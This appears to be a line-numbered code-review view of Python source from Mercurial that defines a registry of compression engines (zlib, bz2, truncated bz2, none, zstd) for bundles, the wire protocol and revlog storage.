3147 3144 CLIENTROLE = 'client'
3148 3145
3149 3146 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3150 3147 (u'name', u'serverpriority',
3151 3148 u'clientpriority'))
3152 3149
3153 3150 class compressormanager(object):
3154 3151 """Holds registrations of various compression engines.
3155 3152
3156 3153 This class essentially abstracts the differences between compression
3157 3154 engines to allow new compression formats to be added easily, possibly from
3158 3155 extensions.
3159 3156
3160 3157 Compressors are registered against the global instance by calling its
3161 3158 ``register()`` method.
3162 3159 """
3163 3160 def __init__(self):
3164 3161 self._engines = {}
3165 3162 # Bundle spec human name to engine name.
3166 3163 self._bundlenames = {}
3167 3164 # Internal bundle identifier to engine name.
3168 3165 self._bundletypes = {}
3169 3166 # Revlog header to engine name.
3170 3167 self._revlogheaders = {}
3171 3168 # Wire proto identifier to engine name.
3172 3169 self._wiretypes = {}
3173 3170
3174 3171 def __getitem__(self, key):
3175 3172 return self._engines[key]
3176 3173
3177 3174 def __contains__(self, key):
3178 3175 return key in self._engines
3179 3176
3180 3177 def __iter__(self):
3181 3178 return iter(self._engines.keys())
3182 3179
3183 3180 def register(self, engine):
3184 3181 """Register a compression engine with the manager.
3185 3182
3186 3183 The argument must be a ``compressionengine`` instance.
3187 3184 """
3188 3185 if not isinstance(engine, compressionengine):
3189 3186 raise ValueError(_('argument must be a compressionengine'))
3190 3187
3191 3188 name = engine.name()
3192 3189
3193 3190 if name in self._engines:
3194 3191 raise error.Abort(_('compression engine %s already registered') %
3195 3192 name)
3196 3193
3197 3194 bundleinfo = engine.bundletype()
3198 3195 if bundleinfo:
3199 3196 bundlename, bundletype = bundleinfo
3200 3197
3201 3198 if bundlename in self._bundlenames:
3202 3199 raise error.Abort(_('bundle name %s already registered') %
3203 3200 bundlename)
3204 3201 if bundletype in self._bundletypes:
3205 3202 raise error.Abort(_('bundle type %s already registered by %s') %
3206 3203 (bundletype, self._bundletypes[bundletype]))
3207 3204
3208 3205 # No external facing name declared.
3209 3206 if bundlename:
3210 3207 self._bundlenames[bundlename] = name
3211 3208
3212 3209 self._bundletypes[bundletype] = name
3213 3210
3214 3211 wiresupport = engine.wireprotosupport()
3215 3212 if wiresupport:
3216 3213 wiretype = wiresupport.name
3217 3214 if wiretype in self._wiretypes:
3218 3215 raise error.Abort(_('wire protocol compression %s already '
3219 3216 'registered by %s') %
3220 3217 (wiretype, self._wiretypes[wiretype]))
3221 3218
3222 3219 self._wiretypes[wiretype] = name
3223 3220
3224 3221 revlogheader = engine.revlogheader()
3225 3222 if revlogheader and revlogheader in self._revlogheaders:
3226 3223 raise error.Abort(_('revlog header %s already registered by %s') %
3227 3224 (revlogheader, self._revlogheaders[revlogheader]))
3228 3225
3229 3226 if revlogheader:
3230 3227 self._revlogheaders[revlogheader] = name
3231 3228
3232 3229 self._engines[name] = engine
3233 3230
3234 3231 @property
3235 3232 def supportedbundlenames(self):
3236 3233 return set(self._bundlenames.keys())
3237 3234
3238 3235 @property
3239 3236 def supportedbundletypes(self):
3240 3237 return set(self._bundletypes.keys())
3241 3238
3242 3239 def forbundlename(self, bundlename):
3243 3240 """Obtain a compression engine registered to a bundle name.
3244 3241
3245 3242 Will raise KeyError if the bundle type isn't registered.
3246 3243
3247 3244 Will abort if the engine is known but not available.
3248 3245 """
3249 3246 engine = self._engines[self._bundlenames[bundlename]]
3250 3247 if not engine.available():
3251 3248 raise error.Abort(_('compression engine %s could not be loaded') %
3252 3249 engine.name())
3253 3250 return engine
3254 3251
3255 3252 def forbundletype(self, bundletype):
3256 3253 """Obtain a compression engine registered to a bundle type.
3257 3254
3258 3255 Will raise KeyError if the bundle type isn't registered.
3259 3256
3260 3257 Will abort if the engine is known but not available.
3261 3258 """
3262 3259 engine = self._engines[self._bundletypes[bundletype]]
3263 3260 if not engine.available():
3264 3261 raise error.Abort(_('compression engine %s could not be loaded') %
3265 3262 engine.name())
3266 3263 return engine
3267 3264
3268 3265 def supportedwireengines(self, role, onlyavailable=True):
3269 3266 """Obtain compression engines that support the wire protocol.
3270 3267
3271 3268 Returns a list of engines in prioritized order, most desired first.
3272 3269
3273 3270 If ``onlyavailable`` is set, filter out engines that can't be
3274 3271 loaded.
3275 3272 """
3276 3273 assert role in (SERVERROLE, CLIENTROLE)
3277 3274
3278 3275 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3279 3276
3280 3277 engines = [self._engines[e] for e in self._wiretypes.values()]
3281 3278 if onlyavailable:
3282 3279 engines = [e for e in engines if e.available()]
3283 3280
3284 3281 def getkey(e):
3285 3282 # Sort first by priority, highest first. In case of tie, sort
3286 3283 # alphabetically. This is arbitrary, but ensures output is
3287 3284 # stable.
3288 3285 w = e.wireprotosupport()
3289 3286 return -1 * getattr(w, attr), w.name
3290 3287
3291 3288 return list(sorted(engines, key=getkey))
3292 3289
3293 3290 def forwiretype(self, wiretype):
3294 3291 engine = self._engines[self._wiretypes[wiretype]]
3295 3292 if not engine.available():
3296 3293 raise error.Abort(_('compression engine %s could not be loaded') %
3297 3294 engine.name())
3298 3295 return engine
3299 3296
3300 3297 def forrevlogheader(self, header):
3301 3298 """Obtain a compression engine registered to a revlog header.
3302 3299
3303 3300 Will raise KeyError if the revlog header value isn't registered.
3304 3301 """
3305 3302 return self._engines[self._revlogheaders[header]]
3306 3303
3307 3304 compengines = compressormanager()
3308 3305
3309 3306 class compressionengine(object):
3310 3307 """Base class for compression engines.
3311 3308
3312 3309 Compression engines must implement the interface defined by this class.
3313 3310 """
3314 3311 def name(self):
3315 3312 """Returns the name of the compression engine.
3316 3313
3317 3314 This is the key the engine is registered under.
3318 3315
3319 3316 This method must be implemented.
3320 3317 """
3321 3318 raise NotImplementedError()
3322 3319
3323 3320 def available(self):
3324 3321 """Whether the compression engine is available.
3325 3322
3326 3323 The intent of this method is to allow optional compression engines
3327 3324 that may not be available in all installations (such as engines relying
3328 3325 on C extensions that may not be present).
3329 3326 """
3330 3327 return True
3331 3328
3332 3329 def bundletype(self):
3333 3330 """Describes bundle identifiers for this engine.
3334 3331
3335 3332 If this compression engine isn't supported for bundles, returns None.
3336 3333
3337 3334 If this engine can be used for bundles, returns a 2-tuple of strings of
3338 3335 the user-facing "bundle spec" compression name and an internal
3339 3336 identifier used to denote the compression format within bundles. To
3340 3337 exclude the name from external usage, set the first element to ``None``.
3341 3338
3342 3339 If bundle compression is supported, the class must also implement
3343 3340 ``compressstream`` and `decompressorreader``.
3344 3341
3345 3342 The docstring of this method is used in the help system to tell users
3346 3343 about this engine.
3347 3344 """
3348 3345 return None
3349 3346
3350 3347 def wireprotosupport(self):
3351 3348 """Declare support for this compression format on the wire protocol.
3352 3349
3353 3350 If this compression engine isn't supported for compressing wire
3354 3351 protocol payloads, returns None.
3355 3352
3356 3353 Otherwise, returns ``compenginewireprotosupport`` with the following
3357 3354 fields:
3358 3355
3359 3356 * String format identifier
3360 3357 * Integer priority for the server
3361 3358 * Integer priority for the client
3362 3359
3363 3360 The integer priorities are used to order the advertisement of format
3364 3361 support by server and client. The highest integer is advertised
3365 3362 first. Integers with non-positive values aren't advertised.
3366 3363
3367 3364 The priority values are somewhat arbitrary and only used for default
3368 3365 ordering. The relative order can be changed via config options.
3369 3366
3370 3367 If wire protocol compression is supported, the class must also implement
3371 3368 ``compressstream`` and ``decompressorreader``.
3372 3369 """
3373 3370 return None
3374 3371
3375 3372 def revlogheader(self):
3376 3373 """Header added to revlog chunks that identifies this engine.
3377 3374
3378 3375 If this engine can be used to compress revlogs, this method should
3379 3376 return the bytes used to identify chunks compressed with this engine.
3380 3377 Else, the method should return ``None`` to indicate it does not
3381 3378 participate in revlog compression.
3382 3379 """
3383 3380 return None
3384 3381
3385 3382 def compressstream(self, it, opts=None):
3386 3383 """Compress an iterator of chunks.
3387 3384
3388 3385 The method receives an iterator (ideally a generator) of chunks of
3389 3386 bytes to be compressed. It returns an iterator (ideally a generator)
3390 3387 of bytes of chunks representing the compressed output.
3391 3388
3392 3389 Optionally accepts an argument defining how to perform compression.
3393 3390 Each engine treats this argument differently.
3394 3391 """
3395 3392 raise NotImplementedError()
3396 3393
3397 3394 def decompressorreader(self, fh):
3398 3395 """Perform decompression on a file object.
3399 3396
3400 3397 Argument is an object with a ``read(size)`` method that returns
3401 3398 compressed data. Return value is an object with a ``read(size)`` that
3402 3399 returns uncompressed data.
3403 3400 """
3404 3401 raise NotImplementedError()
3405 3402
3406 3403 def revlogcompressor(self, opts=None):
3407 3404 """Obtain an object that can be used to compress revlog entries.
3408 3405
3409 3406 The object has a ``compress(data)`` method that compresses binary
3410 3407 data. This method returns compressed binary data or ``None`` if
3411 3408 the data could not be compressed (too small, not compressible, etc).
3412 3409 The returned data should have a header uniquely identifying this
3413 3410 compression format so decompression can be routed to this engine.
3414 3411 This header should be identified by the ``revlogheader()`` return
3415 3412 value.
3416 3413
3417 3414 The object has a ``decompress(data)`` method that decompresses
3418 3415 data. The method will only be called if ``data`` begins with
3419 3416 ``revlogheader()``. The method should return the raw, uncompressed
3420 3417 data or raise a ``RevlogError``.
3421 3418
3422 3419 The object is reusable but is not thread safe.
3423 3420 """
3424 3421 raise NotImplementedError()
3425 3422
3426 3423 class _zlibengine(compressionengine):
3427 3424 def name(self):
3428 3425 return 'zlib'
3429 3426
3430 3427 def bundletype(self):
3431 3428 """zlib compression using the DEFLATE algorithm.
3432 3429
3433 3430 All Mercurial clients should support this format. The compression
3434 3431 algorithm strikes a reasonable balance between compression ratio
3435 3432 and size.
3436 3433 """
3437 3434 return 'gzip', 'GZ'
3438 3435
3439 3436 def wireprotosupport(self):
3440 3437 return compewireprotosupport('zlib', 20, 20)
3441 3438
3442 3439 def revlogheader(self):
3443 3440 return 'x'
3444 3441
3445 3442 def compressstream(self, it, opts=None):
3446 3443 opts = opts or {}
3447 3444
3448 3445 z = zlib.compressobj(opts.get('level', -1))
3449 3446 for chunk in it:
3450 3447 data = z.compress(chunk)
3451 3448 # Not all calls to compress emit data. It is cheaper to inspect
3452 3449 # here than to feed empty chunks through generator.
3453 3450 if data:
3454 3451 yield data
3455 3452
3456 3453 yield z.flush()
3457 3454
3458 3455 def decompressorreader(self, fh):
3459 3456 def gen():
3460 3457 d = zlib.decompressobj()
3461 3458 for chunk in filechunkiter(fh):
3462 3459 while chunk:
3463 3460 # Limit output size to limit memory.
3464 3461 yield d.decompress(chunk, 2 ** 18)
3465 3462 chunk = d.unconsumed_tail
3466 3463
3467 3464 return chunkbuffer(gen())
3468 3465
3469 3466 class zlibrevlogcompressor(object):
3470 3467 def compress(self, data):
3471 3468 insize = len(data)
3472 3469 # Caller handles empty input case.
3473 3470 assert insize > 0
3474 3471
3475 3472 if insize < 44:
3476 3473 return None
3477 3474
3478 3475 elif insize <= 1000000:
3479 3476 compressed = zlib.compress(data)
3480 3477 if len(compressed) < insize:
3481 3478 return compressed
3482 3479 return None
3483 3480
3484 3481 # zlib makes an internal copy of the input buffer, doubling
3485 3482 # memory usage for large inputs. So do streaming compression
3486 3483 # on large inputs.
3487 3484 else:
3488 3485 z = zlib.compressobj()
3489 3486 parts = []
3490 3487 pos = 0
3491 3488 while pos < insize:
3492 3489 pos2 = pos + 2**20
3493 3490 parts.append(z.compress(data[pos:pos2]))
3494 3491 pos = pos2
3495 3492 parts.append(z.flush())
3496 3493
3497 3494 if sum(map(len, parts)) < insize:
3498 3495 return ''.join(parts)
3499 3496 return None
3500 3497
3501 3498 def decompress(self, data):
3502 3499 try:
3503 3500 return zlib.decompress(data)
3504 3501 except zlib.error as e:
3505 3502 raise error.RevlogError(_('revlog decompress error: %s') %
3506 3503 str(e))
3507 3504
3508 3505 def revlogcompressor(self, opts=None):
3509 3506 return self.zlibrevlogcompressor()
3510 3507
3511 3508 compengines.register(_zlibengine())
3512 3509
3513 3510 class _bz2engine(compressionengine):
3514 3511 def name(self):
3515 3512 return 'bz2'
3516 3513
3517 3514 def bundletype(self):
3518 3515 """An algorithm that produces smaller bundles than ``gzip``.
3519 3516
3520 3517 All Mercurial clients should support this format.
3521 3518
3522 3519 This engine will likely produce smaller bundles than ``gzip`` but
3523 3520 will be significantly slower, both during compression and
3524 3521 decompression.
3525 3522
3526 3523 If available, the ``zstd`` engine can yield similar or better
3527 3524 compression at much higher speeds.
3528 3525 """
3529 3526 return 'bzip2', 'BZ'
3530 3527
3531 3528 # We declare a protocol name but don't advertise by default because
3532 3529 # it is slow.
3533 3530 def wireprotosupport(self):
3534 3531 return compewireprotosupport('bzip2', 0, 0)
3535 3532
3536 3533 def compressstream(self, it, opts=None):
3537 3534 opts = opts or {}
3538 3535 z = bz2.BZ2Compressor(opts.get('level', 9))
3539 3536 for chunk in it:
3540 3537 data = z.compress(chunk)
3541 3538 if data:
3542 3539 yield data
3543 3540
3544 3541 yield z.flush()
3545 3542
3546 3543 def decompressorreader(self, fh):
3547 3544 def gen():
3548 3545 d = bz2.BZ2Decompressor()
3549 3546 for chunk in filechunkiter(fh):
3550 3547 yield d.decompress(chunk)
3551 3548
3552 3549 return chunkbuffer(gen())
3553 3550
3554 3551 compengines.register(_bz2engine())
3555 3552
3556 3553 class _truncatedbz2engine(compressionengine):
3557 3554 def name(self):
3558 3555 return 'bz2truncated'
3559 3556
3560 3557 def bundletype(self):
3561 3558 return None, '_truncatedBZ'
3562 3559
3563 3560 # We don't implement compressstream because it is hackily handled elsewhere.
3564 3561
3565 3562 def decompressorreader(self, fh):
3566 3563 def gen():
3567 3564 # The input stream doesn't have the 'BZ' header. So add it back.
3568 3565 d = bz2.BZ2Decompressor()
3569 3566 d.decompress('BZ')
3570 3567 for chunk in filechunkiter(fh):
3571 3568 yield d.decompress(chunk)
3572 3569
3573 3570 return chunkbuffer(gen())
3574 3571
3575 3572 compengines.register(_truncatedbz2engine())
3576 3573
3577 3574 class _noopengine(compressionengine):
3578 3575 def name(self):
3579 3576 return 'none'
3580 3577
3581 3578 def bundletype(self):
3582 3579 """No compression is performed.
3583 3580
3584 3581 Use this compression engine to explicitly disable compression.
3585 3582 """
3586 3583 return 'none', 'UN'
3587 3584
3588 3585 # Clients always support uncompressed payloads. Servers don't because
3589 3586 # unless you are on a fast network, uncompressed payloads can easily
3590 3587 # saturate your network pipe.
3591 3588 def wireprotosupport(self):
3592 3589 return compewireprotosupport('none', 0, 10)
3593 3590
3594 3591 # We don't implement revlogheader because it is handled specially
3595 3592 # in the revlog class.
3596 3593
3597 3594 def compressstream(self, it, opts=None):
3598 3595 return it
3599 3596
3600 3597 def decompressorreader(self, fh):
3601 3598 return fh
3602 3599
3603 3600 class nooprevlogcompressor(object):
3604 3601 def compress(self, data):
3605 3602 return None
3606 3603
3607 3604 def revlogcompressor(self, opts=None):
3608 3605 return self.nooprevlogcompressor()
3609 3606
3610 3607 compengines.register(_noopengine())
3611 3608
3612 3609 class _zstdengine(compressionengine):
3613 3610 def name(self):
3614 3611 return 'zstd'
3615 3612
3616 3613 @propertycache
3617 3614 def _module(self):
3618 3615 # Not all installs have the zstd module available. So defer importing
3619 3616 # until first access.
3620 3617 try:
3621 3618 from . import zstd
3622 3619 # Force delayed import.
3623 3620 zstd.__version__
3624 3621 return zstd
3625 3622 except ImportError:
3626 3623 return None
3627 3624
3628 3625 def available(self):
3629 3626 return bool(self._module)
3630 3627
3631 3628 def bundletype(self):
3632 3629 """A modern compression algorithm that is fast and highly flexible.
3633 3630
3634 3631 Only supported by Mercurial 4.1 and newer clients.
3635 3632
3636 3633 With the default settings, zstd compression is both faster and yields
3637 3634 better compression than ``gzip``. It also frequently yields better
3638 3635 compression than ``bzip2`` while operating at much higher speeds.
3639 3636
3640 3637 If this engine is available and backwards compatibility is not a
3641 3638 concern, it is likely the best available engine.
3642 3639 """
3643 3640 return 'zstd', 'ZS'
3644 3641
3645 3642 def wireprotosupport(self):
3646 3643 return compewireprotosupport('zstd', 50, 50)
3647 3644
3648 3645 def revlogheader(self):
3649 3646 return '\x28'
3650 3647
3651 3648 def compressstream(self, it, opts=None):
3652 3649 opts = opts or {}
3653 3650 # zstd level 3 is almost always significantly faster than zlib
3654 3651 # while providing no worse compression. It strikes a good balance
3655 3652 # between speed and compression.
3656 3653 level = opts.get('level', 3)
3657 3654
3658 3655 zstd = self._module
3659 3656 z = zstd.ZstdCompressor(level=level).compressobj()
3660 3657 for chunk in it:
3661 3658 data = z.compress(chunk)
3662 3659 if data:
3663 3660 yield data
3664 3661
3665 3662 yield z.flush()
3666 3663
3667 3664 def decompressorreader(self, fh):
3668 3665 zstd = self._module
3669 3666 dctx = zstd.ZstdDecompressor()
3670 3667 return chunkbuffer(dctx.read_from(fh))
3671 3668
3672 3669 class zstdrevlogcompressor(object):
3673 3670 def __init__(self, zstd, level=3):
3674 3671 # Writing the content size adds a few bytes to the output. However,
3675 3672 # it allows decompression to be more optimal since we can
3676 3673 # pre-allocate a buffer to hold the result.
3677 3674 self._cctx = zstd.ZstdCompressor(level=level,
3678 3675 write_content_size=True)
3679 3676 self._dctx = zstd.ZstdDecompressor()
3680 3677 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3681 3678 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3682 3679
3683 3680 def compress(self, data):
3684 3681 insize = len(data)
3685 3682 # Caller handles empty input case.
3686 3683 assert insize > 0
3687 3684
3688 3685 if insize < 50:
3689 3686 return None
3690 3687
3691 3688 elif insize <= 1000000:
3692 3689 compressed = self._cctx.compress(data)
3693 3690 if len(compressed) < insize:
3694 3691 return compressed
3695 3692 return None
3696 3693 else:
3697 3694 z = self._cctx.compressobj()
3698 3695 chunks = []
3699 3696 pos = 0
3700 3697 while pos < insize:
3701 3698 pos2 = pos + self._compinsize
3702 3699 chunk = z.compress(data[pos:pos2])
3703 3700 if chunk:
3704 3701 chunks.append(chunk)
3705 3702 pos = pos2
3706 3703 chunks.append(z.flush())
3707 3704
3708 3705 if sum(map(len, chunks)) < insize:
3709 3706 return ''.join(chunks)
3710 3707 return None
3711 3708
3712 3709 def decompress(self, data):
3713 3710 insize = len(data)
3714 3711
3715 3712 try:
3716 3713 # This was measured to be faster than other streaming
3717 3714 # decompressors.
3718 3715 dobj = self._dctx.decompressobj()
3719 3716 chunks = []
3720 3717 pos = 0
3721 3718 while pos < insize:
3722 3719 pos2 = pos + self._decompinsize
3723 3720 chunk = dobj.decompress(data[pos:pos2])
3724 3721 if chunk:
3725 3722 chunks.append(chunk)
3726 3723 pos = pos2
3727 3724 # Frame should be exhausted, so no finish() API.
3728 3725
3729 3726 return ''.join(chunks)
3730 3727 except Exception as e:
3731 3728 raise error.RevlogError(_('revlog decompress error: %s') %
3732 3729 str(e))
3733 3730
3734 3731 def revlogcompressor(self, opts=None):
3735 3732 opts = opts or {}
3736 3733 return self.zstdrevlogcompressor(self._module,
3737 3734 level=opts.get('level', 3))
3738 3735
3739 3736 compengines.register(_zstdengine())
3740 3737
3741 3738 def bundlecompressiontopics():
3742 3739 """Obtains a list of available bundle compressions for use in help."""
3743 3740 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3744 3741 items = {}
3745 3742
3746 3743 # We need to format the docstring. So use a dummy object/type to hold it
3747 3744 # rather than mutating the original.
3748 3745 class docobject(object):
3749 3746 pass
3750 3747
3751 3748 for name in compengines:
3752 3749 engine = compengines[name]
3753 3750
3754 3751 if not engine.available():
3755 3752 continue
3756 3753
3757 3754 bt = engine.bundletype()
3758 3755 if not bt or not bt[0]:
3759 3756 continue
3760 3757
3761 3758 doc = pycompat.sysstr('``%s``\n %s') % (
3762 3759 bt[0], engine.bundletype.__doc__)
3763 3760
3764 3761 value = docobject()
3765 3762 value.__doc__ = doc
3766 3763 value._origdoc = engine.bundletype.__doc__
3767 3764 value._origfunc = engine.bundletype
3768 3765
3769 3766 items[bt[0]] = value
3770 3767
3771 3768 return items
3772 3769
3773 3770 i18nfunctions = bundlecompressiontopics().values()
3774 3771
3775 3772 # convenient shortcut
3776 3773 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now